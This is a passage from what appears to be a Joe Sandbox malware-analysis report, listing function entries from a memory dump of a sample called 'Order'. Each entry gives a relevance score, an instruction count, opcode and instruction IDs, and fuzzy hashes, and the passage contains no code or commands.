                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 413e208e21bbfe81c5e4de4b6f68ea5c93e9a52c74bf3dc974c088afbda2b320
                                                                                                                                    • Instruction ID: 23a6e7f1b75d35815d037ec8fe1c5bf5430d91e970a9c9c46ef0d2b76554396c
                                                                                                                                    • Opcode Fuzzy Hash: 413e208e21bbfe81c5e4de4b6f68ea5c93e9a52c74bf3dc974c088afbda2b320
                                                                                                                                    • Instruction Fuzzy Hash: 1DB17170A046668BDB25DF68C890BA9B3F5EF84704F0485EAD50EE7281EB70DD85CB21
                                                                                                                                    Function 0196E5E7 Relevance: .3, Instructions: 278COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 38d6123e63aa1f8d0dbf96e34e89ef2851bf658e4b4e6562b74eb56754679744
                                                                                                                                    • Instruction ID: bbbd53c85839d1247372da4ea39e429f2d61d20f14fc9bbf3d6ce5ed7ba93a80
                                                                                                                                    • Opcode Fuzzy Hash: 38d6123e63aa1f8d0dbf96e34e89ef2851bf658e4b4e6562b74eb56754679744
                                                                                                                                    • Instruction Fuzzy Hash: 12A12735E006199FEB21DB9CC848FAEBBBCBF40754F050125EA09AB291D7789D45CBE1
                                                                                                                                    Function 01980185 Relevance: .3, Instructions: 276COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: e32db24280bc9d1bd00855304a842cce158e9681490d990d26e57cde6b84f21c
                                                                                                                                    • Instruction ID: e319de9442ec2f022fab34e62c9fc29f6eadd13222b4da0ab65fb31639fc2106
                                                                                                                                    • Opcode Fuzzy Hash: e32db24280bc9d1bd00855304a842cce158e9681490d990d26e57cde6b84f21c
                                                                                                                                    • Instruction Fuzzy Hash: 78A1D270B00716DFDB25EF69C990BAAB7B9FF54715F084029EA0D97281EB34E816CB50
                                                                                                                                    Function 01A14500 Relevance: .3, Instructions: 275COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 71fb6cf8cadef470bafb4576b804da9af51933c32850407ff77d108e8bfa927f
                                                                                                                                    • Instruction ID: bca36982fef5463aa00a8b683cb170b33823143aa97971f568a7ca5177ba1ba9
                                                                                                                                    • Opcode Fuzzy Hash: 71fb6cf8cadef470bafb4576b804da9af51933c32850407ff77d108e8bfa927f
                                                                                                                                    • Instruction Fuzzy Hash: D5A1DE72A14652EFD712DF2CC980B2ABBE9FF88744F050928F9899B655D334ED01CB91
                                                                                                                                    Function 01A12B57 Relevance: .3, Instructions: 266COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                                                                    • Instruction ID: fd6da1cb6446728fe0c399db439e8fcac9d896169b5e0a363a22a2cfcf9268e3
                                                                                                                                    • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                                                                    • Instruction Fuzzy Hash: AEB12971E0061ADFDF15CFA9C880BADBBB5BF88310F24816AE914A7358D730E945CB94
                                                                                                                                    Function 019C60E0 Relevance: .3, Instructions: 264COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 5f64a1b59919a983171c6d9d3b4962ead0877d99b7d45b6915340b85d1033145
                                                                                                                                    • Instruction ID: 9fb549a0213635cee245802cf1959e3543abc4d232b5f69c0fedbd06679db5f5
                                                                                                                                    • Opcode Fuzzy Hash: 5f64a1b59919a983171c6d9d3b4962ead0877d99b7d45b6915340b85d1033145
                                                                                                                                    • Instruction Fuzzy Hash: B791D671D0021AAFDB15CFA8D884BBEBFB9AF48B11F15416DE658EB341D734D9008BA1
                                                                                                                                    Function 0195E3F0 Relevance: .3, Instructions: 261COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 2d43529bb7995ee1bcb007981fe15aba550aa4d864a6714d36c8213e8030285e
                                                                                                                                    • Instruction ID: c9204c1ac7e056b21ff72cb0f6d37d15a39cef2406db6d6c74184ebde859a62a
                                                                                                                                    • Opcode Fuzzy Hash: 2d43529bb7995ee1bcb007981fe15aba550aa4d864a6714d36c8213e8030285e
                                                                                                                                    • Instruction Fuzzy Hash: 12914631A00616DBEB65DF6CC440B7ABBA6FF84B19F054465ED0DAB340E735DA02C7A1
                                                                                                                                    Function 01996ACC Relevance: .2, Instructions: 226COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: e1aa196a779eb2c3e32b16a04c1b5b7041f1eab94ef825eb5415173c2953e8ad
                                                                                                                                    • Instruction ID: e3a7f59da770b0622981cbd0c9690ae1740eb2f97afed7c2d8d203d6ebd9776c
                                                                                                                                    • Opcode Fuzzy Hash: e1aa196a779eb2c3e32b16a04c1b5b7041f1eab94ef825eb5415173c2953e8ad
                                                                                                                                    • Instruction Fuzzy Hash: 7F81B171E006169BDB15CF6DC840ABEBBF9FB48700F04842EE959E7640E334E941CBA4
                                                                                                                                    Function 01A0AB40 Relevance: .2, Instructions: 222COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                                    • Instruction ID: 7620e2ee9b3f3d94636e8282318c45a86f7ff18dfd5efdcedc8711dc885a2394
                                                                                                                                    • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                                    • Instruction Fuzzy Hash: B4818031A107099FDF1ACF99D890ABEBBB2FF84310F198569D9169B384DB34E905CB40
                                                                                                                                    Function 0197E284 Relevance: .2, Instructions: 212COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 963887eda28c8214f9b20ab12fe1017786efea89d7b7754affa26eab207647ce
                                                                                                                                    • Instruction ID: 0ffb6e2e80097506f4955778615258093f5c8c0ccf0a102b7a6976b21fd3dc13
                                                                                                                                    • Opcode Fuzzy Hash: 963887eda28c8214f9b20ab12fe1017786efea89d7b7754affa26eab207647ce
                                                                                                                                    • Instruction Fuzzy Hash: 33813D71A00609AFDB25DFA9C980BEEBBFAFF88354F144429E559A7250D730AC45CB60
                                                                                                                                    Function 0195C640 Relevance: .2, Instructions: 206COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 86f9c2c4e67d8faa6c356086abd168edfeefd88b7921182240c5860e019c1231
                                                                                                                                    • Instruction ID: 371a31e982cf007c5430de5bfeb0f0524fde4849b878ee61c3b39a2f4c77a2ea
                                                                                                                                    • Opcode Fuzzy Hash: 86f9c2c4e67d8faa6c356086abd168edfeefd88b7921182240c5860e019c1231
                                                                                                                                    • Instruction Fuzzy Hash: C971DE75D0122ADBCB25CF58D890BBEBBB8FF48711F14451AE95AAB350D334A905CBE0
                                                                                                                                    Function 019F47A0 Relevance: .2, Instructions: 202COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 39b8381662fad6ce1ad429462657360bb80810b55e2229ba326348db5b73457e
                                                                                                                                    • Instruction ID: 9da78b4842a6857b66e678fe8d2d3ff9628198d943b964fcb09e0416c18333b6
                                                                                                                                    • Opcode Fuzzy Hash: 39b8381662fad6ce1ad429462657360bb80810b55e2229ba326348db5b73457e
                                                                                                                                    • Instruction Fuzzy Hash: 21719C74A00605FFEB20DF99D944A9BBBF8FB80741B14815EE70CAB258C731CA49CB64
                                                                                                                                    Function 0195260B Relevance: .2, Instructions: 201COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 9a5a5fb3af123b32fd2d362df88e758c7ac869635d432d19ba5702b5973cbd9f
                                                                                                                                    • Instruction ID: 3a71858446cb621cf22a68abd4176776ecf62e8eb23d1857b723766a7229cc63
                                                                                                                                    • Opcode Fuzzy Hash: 9a5a5fb3af123b32fd2d362df88e758c7ac869635d432d19ba5702b5973cbd9f
                                                                                                                                    • Instruction Fuzzy Hash: 8071AF36604242DFD351DF28C484B2AB7E9FF84310F0885AAEC9D9B351DB34E946CBA1
                                                                                                                                    Function 019C035C Relevance: .2, Instructions: 198COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                                                    • Instruction ID: c6c6d5fcff63ab85bd00e71090469214cce134abf0d90a93ca2c31275ca85dca
                                                                                                                                    • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                                                    • Instruction Fuzzy Hash: 6C717E75E00609EFDB10DFA9C984EEEBBB8FF98740F144569E949A7250DB34EA01CB50
                                                                                                                                    Function 019D62A0 Relevance: .2, Instructions: 198COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 50c529b2087e1399a3e9727737cdbee531de5eab17bab7977e7389749f14adf3
                                                                                                                                    • Instruction ID: c70708f715aabfc7a3c131f54e1ae3d4ebfe6ca2a80d02d382b95fc07bcd0ad4
                                                                                                                                    • Opcode Fuzzy Hash: 50c529b2087e1399a3e9727737cdbee531de5eab17bab7977e7389749f14adf3
                                                                                                                                    • Instruction Fuzzy Hash: F671E432200701AFE732DF18C844F56BBFAEF80B51F158918E65A972A1DB75E944CB50
                                                                                                                                    Function 01948AA0 Relevance: .2, Instructions: 197COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 476e6326cc289210894e28da84658d0c6a06928c7ca14dfe959e25b1b3d85bde
                                                                                                                                    • Instruction ID: 0d769d46e09afc80fe36ee7b51fac9593bb95556338378d020648426c482ff08
                                                                                                                                    • Opcode Fuzzy Hash: 476e6326cc289210894e28da84658d0c6a06928c7ca14dfe959e25b1b3d85bde
                                                                                                                                    • Instruction Fuzzy Hash: 9981BF72A04306CFDB28CF98D884FADBBB5BF88715F594129E908AB285C7749D45CB90
                                                                                                                                    Function 01A18324 Relevance: .2, Instructions: 192COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 5dd06052a00abd7fd106df78e209c5131ee279a4a59055f8225eb644a7b199b0
                                                                                                                                    • Instruction ID: 6dd705fc38012354232462ccc2e65edb238d75ac1ce096f69085b521c13e91f4
                                                                                                                                    • Opcode Fuzzy Hash: 5dd06052a00abd7fd106df78e209c5131ee279a4a59055f8225eb644a7b199b0
                                                                                                                                    • Instruction Fuzzy Hash: B0712A71E00209AFDB16DF94C881FEEBBB9FF44360F104169EA25B7294D774AA05CB90
                                                                                                                                    Function 019FA250 Relevance: .2, Instructions: 184COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 1bf8353a9ae36b135c99b6328e497ee93cb914f845a971a3787728353a0cc959
                                                                                                                                    • Instruction ID: 48d8fbef8c29cf51006f24d0c4bb579df356dc6a28f51d11adcb1e8b17835394
                                                                                                                                    • Opcode Fuzzy Hash: 1bf8353a9ae36b135c99b6328e497ee93cb914f845a971a3787728353a0cc959
                                                                                                                                    • Instruction Fuzzy Hash: D7519D72504612BFD712DE68C884F5BBBE8EBC5B50F01096DBB48DB150E670ED05C7A2
                                                                                                                                    Function 019E8350 Relevance: .2, Instructions: 161COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: d9b365a556375c48b11dcfc23ab3f4d0be3dc48c153189e6ea4d68b2e7f6579f
                                                                                                                                    • Instruction ID: 47b477377263a1e8b2e4748ef11a4c9c8abf76e9262ad87cbdd3b0fa4eb03d27
                                                                                                                                    • Opcode Fuzzy Hash: d9b365a556375c48b11dcfc23ab3f4d0be3dc48c153189e6ea4d68b2e7f6579f
                                                                                                                                    • Instruction Fuzzy Hash: 4F517170900705EFD722DF9AC888A6BFBF8FF94710F104A1ED25A576A1D770A545CB90
                                                                                                                                    Function 0197E443 Relevance: .2, Instructions: 158COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 20de2da0c43b7307e498399a564e09f3ffd299c9eff0ecf6cd1aa22eb647e57d
                                                                                                                                    • Instruction ID: eae26f7d5e3a3609f402c3426bf9ffa771d8b8a7b5009a4dc2bbf65cfaeacb57
                                                                                                                                    • Opcode Fuzzy Hash: 20de2da0c43b7307e498399a564e09f3ffd299c9eff0ecf6cd1aa22eb647e57d
                                                                                                                                    • Instruction Fuzzy Hash: 02515C71610A05DFCB22EF69C9C0EAAB7FDFF54784F400869EA4A97260D734E941CB50
                                                                                                                                    Function 019E4180 Relevance: .2, Instructions: 156COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 9a1b50da1527e8672effd92929d47e772565a0605764880becf75eaafb447bfb
                                                                                                                                    • Instruction ID: b4bbdb7da8c7158991c06bae9d8820cec6365ad41809267cbc2a413a49207fac
                                                                                                                                    • Opcode Fuzzy Hash: 9a1b50da1527e8672effd92929d47e772565a0605764880becf75eaafb447bfb
                                                                                                                                    • Instruction Fuzzy Hash: 93519A716083029FD756DF29C984A6BBBE9BFC8204F444A2EF589C7250EB30D905CB92
                                                                                                                                    Function 019645B1 Relevance: .2, Instructions: 156COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                                                    • Instruction ID: 4bdc8ff37f1c2f0e5a0c966f7d0103252d8015a9bba1f29e19f901d30f047135
                                                                                                                                    • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                                                    • Instruction Fuzzy Hash: 45516C71E0021AABDF15DF98C440BEEBBB9EF45754F05406AEA09AB250D738DE44CBA0
                                                                                                                                    Function 019CE9E0 Relevance: .2, Instructions: 154COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                                                    • Instruction ID: 5b64b4bada02653668a87dd4364a0156b23102dd3c86fcaf870363758f3c1894
                                                                                                                                    • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                                                    • Instruction Fuzzy Hash: 0E51B53190020AAFEF21DF95C884FBEBFB8AB40B25F11466DD55B67190D7309E40CBA2
                                                                                                                                    Function 01A08B28 Relevance: .2, Instructions: 152COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 7598673edf0408b1087e3cf063a202f5f71eb2f618beca88e1e120e4bb6d355d
                                                                                                                                    • Instruction ID: d2c29f9d4df89cf757adc3303cacb672ce2d18e652122c32733f5f6c1791d092
                                                                                                                                    • Opcode Fuzzy Hash: 7598673edf0408b1087e3cf063a202f5f71eb2f618beca88e1e120e4bb6d355d
                                                                                                                                    • Instruction Fuzzy Hash: 7341D770B01A119BD72BDB2DE954B7FBBAAEF91360F084119E915872C1DB3CD801C699
                                                                                                                                    Function 019CCBF0 Relevance: .1, Instructions: 148COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 6b5e12e49f856518c714a442679e4d4d74cd2ed1872b3a7b9e4cda7030fd91bc
                                                                                                                                    • Instruction ID: a48b43e483647fd461552d7873f6eb0cbdbbe237afcdcfaf6c8181fc601a288d
                                                                                                                                    • Opcode Fuzzy Hash: 6b5e12e49f856518c714a442679e4d4d74cd2ed1872b3a7b9e4cda7030fd91bc
                                                                                                                                    • Instruction Fuzzy Hash: 2E519F75D00216EFCB21DFA9C880A9EBFB9FF88B54B554919E58DA7300D730AE41CB91
                                                                                                                                    Function 01A0A9D3 Relevance: .1, Instructions: 139COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                                                    • Instruction ID: 4e4116ac0edc33949127dd97f537a33596b99e50621f4e67793096f4e2072466
                                                                                                                                    • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                                                    • Instruction Fuzzy Hash: EE41E772A007169FD726CF28D980A6AB7A9FF80314F05462EEA16872C0EB30ED54C7D0
                                                                                                                                    Function 019701F8 Relevance: .1, Instructions: 138COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 9880e6d9a87cadc12a7a26b69a526485e296a212d02ed2084f4213a572fcb3d3
                                                                                                                                    • Instruction ID: 9dd0bf72443720920269314385007ca8351e681f3ab886212419ea4e24d99b43
                                                                                                                                    • Opcode Fuzzy Hash: 9880e6d9a87cadc12a7a26b69a526485e296a212d02ed2084f4213a572fcb3d3
                                                                                                                                    • Instruction Fuzzy Hash: B041BF36D00219DBDB14DF98C440AEEBBB5BF8AB10F18815AF819F7250D7359D41CBA4
                                                                                                                                    Function 0196EBFC Relevance: .1, Instructions: 138COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 25fb704625c123771baf4bc3b03702ff6291ace4d3fc9a4518c223d8a1c6aef1
                                                                                                                                    • Instruction ID: 889ffd02268bf00fa2dc62fa746add53730893e37b911207a5fa9784e143060a
                                                                                                                                    • Opcode Fuzzy Hash: 25fb704625c123771baf4bc3b03702ff6291ace4d3fc9a4518c223d8a1c6aef1
                                                                                                                                    • Instruction Fuzzy Hash: CB41A1756043029FD725DF28C880A6BB7EDFB84358F004829E95FC7615EB35E8458BA1
                                                                                                                                    Function 01982750 Relevance: .1, Instructions: 137COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
